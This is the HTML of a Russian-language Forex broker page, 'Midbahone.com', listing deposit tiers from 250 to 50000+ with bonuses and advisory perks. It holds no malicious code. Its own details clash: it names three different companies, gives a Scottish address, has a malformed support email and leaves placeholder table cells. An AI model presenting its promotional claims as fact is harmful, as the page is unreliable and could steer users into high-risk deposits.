<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
	    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta name="format-detection" content="telephone=no">
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no, maximum-scale=1">
    <title>Midbahone.com</title>
    <link rel="shortcut icon" href="img/favicon/favicon.png" type="image/x-icon">
    <link rel="apple-touch-icon" href="img/favicon/apple-touch-icon.png">
    <link rel="apple-touch-icon" sizes="72x72" href="img/favicon/apple-touch-icon-72x72.png">
    <link rel="apple-touch-icon" sizes="114x114" href="img/favicon/apple-touch-icon-114x114.png">
   <link rel="stylesheet" href="css/animate.css">
    <link href="css/components/bootstrap/bootstrap.min.css" rel="stylesheet">
    <link rel="stylesheet" href="css/components/bootstrap/bootstrap-theme.min.css">
   <link rel="stylesheet" href="css/form.css">
   <link rel="stylesheet" type="text/css" href="css/style.css" />
   <link rel="stylesheet" type="text/css" href="http://maxcdn.bootstrapcdn.com/font-awesome/4.2.0/css/font-awesome.min.css">
   <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/ekko-lightbox/5.3.0/ekko-lightbox.css">
   <link rel="stylesheet" type="text/css" href="css/menu.css" />

    <link rel="stylesheet" href="css/table.css">
</head>

<body style="min-width: 320px" onload="init()">


    
 <svg xmlns="http://www.w3.org/2000/svg" version="1.1" class="filters hidden">
        <defs>
            <filter id="blur" x="-20%" y="0" width="140%" height="100%">
                <feGaussianBlur in="SourceGraphic" stdDeviation="0,0" />
            </filter>
        </defs>
    </svg>
<div class="mobileMain">
    <div class="menu">
            <div class="menu-bg js-blur"></div>
            <nav class="menu-items">
                <a href="index.html" class="menu-item">
                    <span class="js-blur">ГЛАВНАЯ</span>
                </a>
                <a href="indexType.html" class="menu-item">
                    <span class="js-blur">ТИПЫ СЧЕТОВ</span>
                </a>
                <a href="analysisIndex.html" class="menu-item">
                    <span class="js-blur">АНАЛИЗ РЫНКА</span>
                </a>
                <a href="training.html" class="menu-item">
                    <span class="js-blur">ОБУЧЕНИЕ</span>
                </a>
                <a href="sale.html" class="menu-item">
                    <span class="js-blur">БОНУСЫ И АКЦИИ</span>
                </a>
                <a href="#" class="menu-item">
                    <span class="js-blur">КОНТАКТЫ</span>
                </a>
                
                    <a href="#" class=" menu-item" data-toggle="modal" data-target="#main-modal">  <span class="js-blur">ВОЙТИ</span></a>
                    <a href="#" class=" menu-item" data-toggle="modal" data-target="#main-modal_come">  <span class="js-blur">ОТКРЫТЬ СЧЕТ</span></a>
                </a>
            </nav>
        </div>
</div>








<div id="main-modal" class="modal  modal-child" data-backdrop-limit="1" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true" data-modal-parent="#myModal">
    <div class="modal-dialog modal-sm">
        <!-- Modal content-->
        <div class="modal-content">
            <div class="modal-header">
                <button type="button" class="close" data-dismiss="modal">
                     <span aria-hidden="true">&times;</span>
                </button>
            </div>
            <div class="modal-body">
                <div class="login-box">
                    <h2>Вход</h2>
                    <form class="form_enter" id="form_enter_modal">
                        <div class="form_group--email"><label>Email<input type="email" data-validation-type="email" name="email" placeholder="" required="" > <div class="error"></div></label></div>
                        <div class="form_group--Password"><label>Password<input type="password" data-validation-type="password" name="password" placeholder="" required="" class="invalid"> <div class="error">- поле должно содержать правильный email-адрес</div></label></div>
                        <a href="#main-modal_password" data-dismiss="modal" role="button" class="password_recovery"  data-toggle="modal"  >Забыли пароль?</a>
                        <div class="form_group--button"> <button class="send-form btn btn-primary " type="submit"><span class="button--inner">Вход</span> </button><span class="link">midbahone.com</span><button type="button" class="btn btn-default close-form" data-dismiss="modal" style="display: none;"> Назад</button> </div>
                    </form>
                </div>
            </div>
        </div>
    </div>
</div>





<div id="main-modal_password" class="modal fade modal-child" data-backdrop-limit="1" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true" data-modal-parent="#main-modal">
    <div class="modal-dialog modal-sm" role="document">
        <div class="modal-content">
            <div class="modal-header">
                <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                    <span aria-hidden="true">&times;</span>
                </button>
            </div>
            <div class="modal-body">
                <div class="login-box">
                    <h2>Забыли пароль?</h2>
                    <form class="form_enter" id="password_recovery">
                        <div class="form_group--email"><label>Email<input type="email" data-validation-type="email" name="email" placeholder="" required="" class="invalid"> <div class="error">- поле должно содержать правильный email-адрес</div></label></div>
                        <div class="form_group--button"> <button class="send-form btn btn-primary " type="submit"><span class="button--inner">Вход</span> </button><span class="link">midbahone.com</span><button type="button" class="btn btn-default close-form" data-dismiss="modal" style="display: none;"> Назад</button> </div>
                    </form>
                </div>
            </div>
        </div>
    </div>
</div>

<div id="main-modal_come" class="modal fade "  tabindex="-1" role="dialog">
    <div class="modal-dialog modal-sm" role="document">
        <div class="modal-content">
            <div class="modal-header">

                <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                    <span aria-hidden="true">&times</span>
                </button>
            </div>
            <div class="modal-body">
                <div class="login-box">
                    <h2>Форма регистрации</h2>
                    <form class="form-container" id="register_form"></form>
                </div>
            </div>
        </div>
    </div>
</div>



  <div class="background-container">
        <header>
            
<div class="container-fluid ">
    <div class=" header_logo">
        <div class=""><h2 class="logo">midbahone<span>.</span>com</h2></div>
        <div class="  flex-button media_nav_table"><a href="#" class="button button_come " data-toggle="modal" data-target="#main-modal">ВОЙТИ</a><a href="#" class="button button_open" data-toggle="modal" data-target="#main-modal_come">ОТКРЫТЬ СЧЕТ</a></div>
        <div class="border"></div>
    </div>
    <button class="menu-toggle"><span>Open Menu</span></button>
    <div class="row media_nav_table">
        <div class="bgfixed"></div>
        <div class="col-sm-6 col-sm-offset-6 nav_block">
            <ul class="header_nav ">
                <li><a href="index.html">ГЛАВНАЯ</a></li>
                <li><a href="indexType.html">ТИПЫ СЧЕТОВ</a></li>
                <li><a href="analysisIndex.html">АНАЛИЗ РЫНКА</a></li>
                <li><a href="training.html">ОБУЧЕНИЕ</a></li>
                <li><a href="sale.html">БОНУСЫ И АКЦИИ</a></li>
                <li><a class="contact" href="#subscribe_form">КОНТАКТЫ</a></li>
            </ul>
            <ul class="languagepicker">
                <a href="#nl"><li><img src="img/russia.png"/></li></a>
                <a href="#nl"><li><img src="img/russia.png"/></li></a>
            </ul>

        </div>

    </div>
</div>

        </header>
        <section class="page_type page_section ">
            <div class="container">
    <div class="row margin_header">
        <div class="col-sm-10 col-sm-offset-1 type_container">
            <div class="row">
                <div class="col-md-4">
                    <h2 class="title">Типы
                        счетов</h2>
                </div>
                <div class="col-md-8">
                    <p class="header-text">Наши счета предоставляют частным и корпоративным клиентам преимущества для торговли на мировом рынке Forex с использованием самой передовой торговой платформы с любого ПК, ноутбука, мобильного телефона или планшета.</p>

                </div>
            </div>


        </div>
    </div>
    <div class="table_page_type">
        <div class="row">
            <div class="col-sm-10 col-sm-offset-1 padding">
                <div class="tables-wrapper">
                    <div class="table-container table-responsive full-info" id="navigate-table">
                        <table class="table">
                            <thead>
                            <tr>
                                <th>
                                    <p>Выбор <br> счета:</p>
                                    <div class="controls">
                                        <div class="arrow">
                                            <button class="slide-left"><span class="glyphicon glyphicon-chevron-left" aria-hidden="true"></span></button>
                                        </div>
                                        <div class="arrow">
                                            <button class="slide-right"><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span></button>
                                        </div>
                                    </div>
                                </th>
                            </tr>
                            </thead>
                            <tbody>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> Минимальная сделка</td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> Вывод средств</td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> Приветсвенный бонус</td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> On-line chat</td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> Отчеты ринка</td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> Аккаунт менеджер</td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> Знакомство с платформой</td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> К-во доступных торг. инструментов</td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> Пакет обучения</td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> Индивидуальный тренинг</td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> Торговля один на один</td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> Развернутый анализ с персональным финансовым аналитиком</td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> Консультация по управлению рисками</td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> Консультация Дилинг центра</td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> Торговые сигналы</td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> Разработка персональной стратегии</td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> Личная связь с експертом</td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> Вид инструменты хеджирования</td>
                            </tr>
                            <tr>
                                <td></td>
                            </tr>
                            </tbody>
                        </table>
                    </div>
                    <div class="table-container table-responsive" id="accounts-table">
                        <table class="table">
                            <thead>
                            <tr>
                                <th></th>
                                <th>
                                    Тестовый
                                    <p>250</p>
                                    <button class="btn btn-yellow button_open button" data-toggle="modal" data-target="#main-modal_come">Открыть счет</button>
                                </th>
                                <th>
                                    MINI
                                    <p>1000</p>
                                    <button class="btn btn-yellow button_open button" data-toggle="modal" data-target="#main-modal_come">Открыть счет</button>
                                </th>
                                <th>
                                    Standart
                                    <p>5000</p>
                                    <button class="btn btn-yellow button_open button" data-toggle="modal" data-target="#main-modal_come">Открыть счет</button>
                                </th>
                                <th>
                                    Gold
                                    <p>10000</p>
                                    <button class="btn btn-yellow button_open button" data-toggle="modal" data-target="#main-modal_come">Открыть счет</button>
                                </th>
                                <th>
                                    Platinum
                                    <p>25000</p>
                                    <button class="btn btn-yellow button_open button" data-toggle="modal" data-target="#main-modal_come">Открыть счет</button>
                                </th>
                                <th>
                                    Vip
                                    <p>50000+</p>
                                    <button class="btn btn-yellow button_open button" data-toggle="modal" data-target="#main-modal_come">Открыть счет</button>
                                </th>
                            </tr>
                            </thead>
                            <tbody>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> Минимальная сделка</td>
                                <td>5000</td>
                                <td>10000</td>
                                <td>10000</td>
                                <td>50000</td>
                                <td>100000</td>
                                <td>150000</td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> Вывод средств</td>
                                <td>Standart rules</td>
                                <td>Standart rules</td>
                                <td>Ячейка</td>
                                <td>Ячейка</td>
                                <td>Ячейка</td>
                                <td>Ячейка</td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> Приветсвенный бонус</td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> On-line chat</td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> Отчеты ринка</td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> Аккаунт менеджер</td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> Знакомство с платформой</td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> К-во доступных торг. инструментов</td>
                                <td>70</td>
                                <td>70</td>
                                <td>140</td>
                                <td>140</td>
                                <td>200</td>
                                <td>200</td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> Пакет обучения</td>
                                <td>Start</td>
                                <td>Start</td>
                                <td>Advanced</td>
                                <td>PRO</td>
                                <td>PRO+</td>
                                <td>VIP</td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> Индивидуальный тренинг</td>
                                <td>2</td>
                                <td>4</td>
                                <td>6</td>
                                <td>10</td>
                                <td>15</td>
                                <td>&#8734;</td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> Торговля один на один</td>
                                <td><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> Развернутый анализ с персональным финансовым аналитиком</td>
                                <td><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span> once a week <br>(~30 min)</td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span> at least twice a week <br>(~2 hours)</td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span> unlimited</td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> Консультация по управлению рисками</td>
                                <td><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span> once a week</td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span> unlimited</td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> Консультация Дилинг центра</td>
                                <td><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> Торговые сигналы</td>
                                <td><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> Разработка персональной стратегии</td>
                                <td><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> Личная связь с експертом</td>
                                <td><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                            </tr>
                            <tr>
                                <td><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span> Вид инструменты хеджирования</td>
                                <td><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></td>
                                <td><span class="glyphicon glyphicon-ok" aria-hidden="true"></span></td>
                            </tr>
                            <tr>
                                <td></td>
                                <td><button class="btn btn-yellow button_open button" data-toggle="modal" data-target="#main-modal_come">Открыть счет</button></td>
                                <td><button class="btn btn-yellow button_open button" data-toggle="modal" data-target="#main-modal_come">Открыть счет</button></td>
                                <td><button class="btn btn-yellow button_open button" data-toggle="modal" data-target="#main-modal_come">Открыть счет</button></td>
                                <td><button class="btn btn-yellow button_open button" data-toggle="modal" data-target="#main-modal_come">Открыть счет</button></td>
                                <td><button class="btn btn-yellow button_open button" data-toggle="modal" data-target="#main-modal_come">Открыть счет</button></td>
                                <td><button class="btn btn-yellow button_open button" data-toggle="modal" data-target="#main-modal_come">Открыть счет</button></td>
                            </tr>
                            </tbody>
                        </table>
                    </div>
                </div>
            </div>

        </div>

    </div>

</div>


        </section>
        <section>
            <div class=" services_section">
    <div class="container">
        <div class="row">
            <img src="img/Bitcoin.png" alt="">
            <img src="img/Visa.svg" alt="">
            <img src="img/mastercard.svg" alt="">
            <img src="img/webmoney-paying-logo.svg" alt="">
            <img src="img/qiwi.png" alt="">
        </div>
    </div>
</div>
        </section>

        <section>
            <div class="section_nav">
    <div class="container">
        <div class="row">
            <div class="col-sm-10 col-sm-offset-1 wrapper_logo">
                <a href="index.html">ГЛАВНАЯ</a>
                <a href="indexType.html">ТИПЫ СЧЕТОВ</a>
                <a href="analysisIndex.html">АНАЛИЗ РЫНКА</a>
                <a href="training.html">ОБУЧЕНИЕ</a>
                <a href="sale.html">БОНУСЫ И АКЦИИ</a>
                <a href="clientInfo.html">Клиентское соглашение</a>
            </div>

        </div>
    </div>
</div>

        </section>
    <section class="map_container">
        <iframe src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1105.7221294896665!2d-2.799814591842291!3d56.33941896035866!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x4886579acaa27bf5%3A0x4adae049d49bfb78!2zMTQgQmVsbCBTdCwgU3QgQW5kcmV3cyBLWTE2IDlVWCwg0JLQtdC70LjQutC-0LHRgNC40YLQsNC90ZbRjw!5e0!3m2!1suk!2sua!4v1508496294482" width="100%" height="350" frameborder="0" style="border:0" allowfullscreen></iframe>
    </section>
        <footer>
            
<div class="contact_info">
    <div class="container">
        <div class="row contact_info_row">
            <div class="col-sm-5 col-sm-offset-1 padding">
                <div class="row">
                    <div class="col-md-6">
                        <h6 class="footer_title">Контактная
                            информация</h6>
                    </div>
                </div>

                <p>Есть вопросы? <br>
                    Нужна помощь в открытии вашего счета? <br>
                    Наша служба поддержки клиентов заботится обо всем. <br>
                    Свяжитесь с нами бесплатно с Пн по Пт:</p>
                <p class="footer_text"><span>Адрес:</span>
                    14 Bell Street, St Andrews, Fife KY16 9UR, Scotland</p>
                <p class="footer_text"><span>
Телефон службы <br>
поддержки клиентов:</span>+44 208 5888552</p>
                <p class="footer_text"><span>Email: </span>support@midbahone.caom</p>
                <p class="small_footer_text">Smartoption LTD, Avan District, Tumanyan 13/2-6, +37460465887</p>
            </div>
            <div class="col-sm-4 col-sm-offset-1">
                    <div class="row">
                        <div class="col-md-7">
                            <h6 class="footer_title" style="margin-bottom: 17px">Контактная
                                форма</h6>
                        </div>
                    </div>

                <form class="form-container" id="subscribe_form"></form>
            </div>
        </div>
        <div class="row line">
            <div class="col-sm-10 col-sm-offset-1 padding">
                <p class="footer_info_text">Финансовые операции, предлагаемые данным сайтом, могут обладать повышенным уровнем риска. Приобретая предлагаемые данным сайтом финансовые услуги и инструменты, вы можете понести серьезные финансовые потери или полностью утратить средства, находящиеся на вашем гарантийно-торговом счету. Пожалуйста, оцените все финансовые риски и посоветуйтесь с независимым финансовым консультантом перед началом торговли. MIDBAHONE не несет ответственности за любые прямые, косвенные и случайные убытки или любой другой ущерб, связанный с действиями
                    пользователя на данном сайте. Услуги предоставляет Explatinum LP.</p>
            </div>
        </div>
        <p class="copy">Copyright © Midbahone 2014-2017. Все права защищены</p>
    </div>

</div>
        </footer>
         <script
        src="https://code.jquery.com/jquery-3.2.1.min.js"
        integrity="sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4="
        crossorigin="anonymous"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js"></script>

<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"
        integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa"
        crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/ekko-lightbox/5.3.0/ekko-lightbox.js"></script>
<script>
    $(document).on('click', '[data-toggle="lightbox"]', function (event) {
        event.preventDefault();
        $(this).ekkoLightbox({
            alwaysShowClose: true
        });
    });
</script>
<script src="js/form.js"></script>
<!--<script src="js/script.min.js"></script>-->
<script src="js/tweenlite.js"></script>
<script src="js/graph.js"></script>
<script src="js/custom.js"></script>
<script src="js/table.js"></script>
<script src="js/TweenMax.min.js"></script>
<script src="js/motionblur.js"></script>
<script src="js/menu.js"></script>






</body>

</html>